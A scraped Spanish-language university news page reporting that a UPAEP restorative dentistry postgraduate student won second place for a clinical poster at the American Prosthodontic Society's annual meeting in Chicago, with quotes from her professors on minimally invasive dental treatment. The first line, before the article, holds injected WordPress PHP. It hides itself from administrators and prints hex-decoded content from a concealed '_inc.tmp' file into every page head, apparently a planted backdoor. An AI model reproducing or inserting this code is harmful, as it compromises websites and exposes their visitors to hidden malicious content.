if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estudiante de Posgrado de Odontología UPAEP, obtiene 2º lugar en certamen celebrado en Chicago, Estados Unidos – La Opinión Universitaria La Opinión Universitaria
Menu

Estudiante de Posgrado de Odontología UPAEP, obtiene 2º lugar en certamen celebrado en Chicago, Estados Unidos

Cerca del 90 por ciento de la población presenta problemas de mutilación de piezas dentales por malas prácticas odontológicas.

La CD. María Tadea Lovo Cáceres, estudiante del Posgrado en Odontología Restaurativa de la UPAEP, obtuvo el segundo lugar en el 91st Annual Meeting of the American Prosthodontic Society en la categoría de Clinical Digital Poster, celebrado en la ciudad de Chicago, Estados Unidos.

La CD. Lovo Cáceres presentó un cartel en el que comparte la rehabilitación completa que se basa en la reparación de piezas dentales que son mínimamente invasivas para poder brindar a los pacientes una función estética y mantener la estructura de los dientes sin generar un desgaste.

Expresó que se presentaron 50 carteles de distintas instituciones como la Universidad de Baja California, la UNAM, la BUAP, la UIC, NYU, la Universidad de Rochester, Loma Linda, Harvard, UCLA, hospitales pediátricos, entre otros.

En la conferencia de prensa María Tadea Lovo estuvo acompañada por CD. Manuel Ismael Paredes, profesor del Posgrado en Odontología Restaurativa y por el CD. Alfredo Balcázar Victoria, Coordinador del Posgrado en Odontología Restaurativa.

En su intervención el CD. Manuel Ismael Paredes, apuntó que este tipo de trabajos odontológicos cada vez están teniendo una mayor demanda por parte de la población por el nivel de estrés que están presentando los pacientes, y que se ve reflejado en el desgaste de los dientes por diferentes partes de la boca. Por lo tanto, reiteró que el tratamiento es de mínima invasión y permite preservar la mayor cantidad de piezas dentales y son tratamientos de nueva generación que no sólo se están realizando en México, sino en diferentes partes del mundo, principalmente en los Estados Unidos, además de que procuramos que los alumnos estén siempre a la vanguardia con los nuevos materiales y basándonos en las evidencias científicas.

Indicó que el desgate de las piezas dentales se debe a los altos índices de estrés, la existencia de mucho erupcismo, una fricción no normal en los dientes del paciente, por lo que requiere cada vez más de trabajos estéticos o exige de una mayor atención para mostrar un dentadura lo mejor posible. Agregó que este tipo de trabajos se viene probando desde hace 20 años atrás y cada vez se va mejorando.

Por su parte, el Dr. Alfredo Balcázar Victoria, Coordinador del Posgrado en Odontología Restaurativa de la UPAEP, acotó que en la actualidad se vive en una situación de estrés tan terrible que la gente arremete contra su propio organismo y parte de este reflejo es la presencia de estos problemas en los dientes, por morder lápices o algunos otros artículos que usamos con las manos.

Advirtió que cerca del 90 por ciento de la población presenta problemas de mutilación de piezas dentales por malas prácticas odontológicas que también nos llevan a malos hábitos. “Una mutilación dental temprana en pacientes que es una odontología poco conservadora, nos lleva a tener problemas funcionales, lo cual repercute en la detención de los pacientes”.

Dijo que desgraciadamente en la práctica general de la odontología se abusa de los materiales de restauración directa de los dientes, lo que provoca que se presenten más problemas de los que se podrían evitar con una buena atención.

Reiteró que si el paciente no tiene una sonrisa adecuada se siente inseguro, no sonríen, se tapan y son retraídos tímidos, etc., con nuestro trabajo en clínica hemos visto cómo los pacientes se van contentos y satisfechos con el trabajo tanto funcional como estético que les realizamos.

María Tadea Lovo es originaria de Nicaragua, y manifestó que durante la asistencia a la edición del año pasado de la Annual Meeting of the American Prosthodontic Society es que decidió participar con su cartel en este 2019.

Agregó, “Me gustó mucho la idea de que estudiantes de otras universidades pudieran participar, para septiembre mi caso ya se encontraba terminado y envié la aplicación; un resumen, el caso clínico, conclusión y discusión y para enero me dieron un dictamen favorable para poder presentarlo en la 91st Annual Meeting of the American Prosthodontic Society”.

“El participar en este certamen me demuestra que soy capaz y que nuestro posgrado está en un muy buen nivel, que el trabajo que nosotros realizamos pueden presentarse a nivel internacional; espero que muchos de mis compañeros puedan ir los siguientes años para que la Universidad se dé a conocer”.

Destacó que la UPAEP da todas las herramientas necesarias para salir adelante, consideró que para su futuro profesional el cursar el posgrado en la UPAEP le servirá muchísimo porque ha aprendido a desarrollar y capitalizar sus habilidades, además, indicó que el plus que otorga la Institución no sólo radica en la parte clínica sino en el trabajo de laboratorio.

Indicó que decidió venir a México a estudiar su posgrado porque desde pequeña ha sabido que es un país con excelentes odontólogos, además del excelente programa académico que optó por la UPAEP.

  • No comments

    Deja una respuesta

    Tweets recientes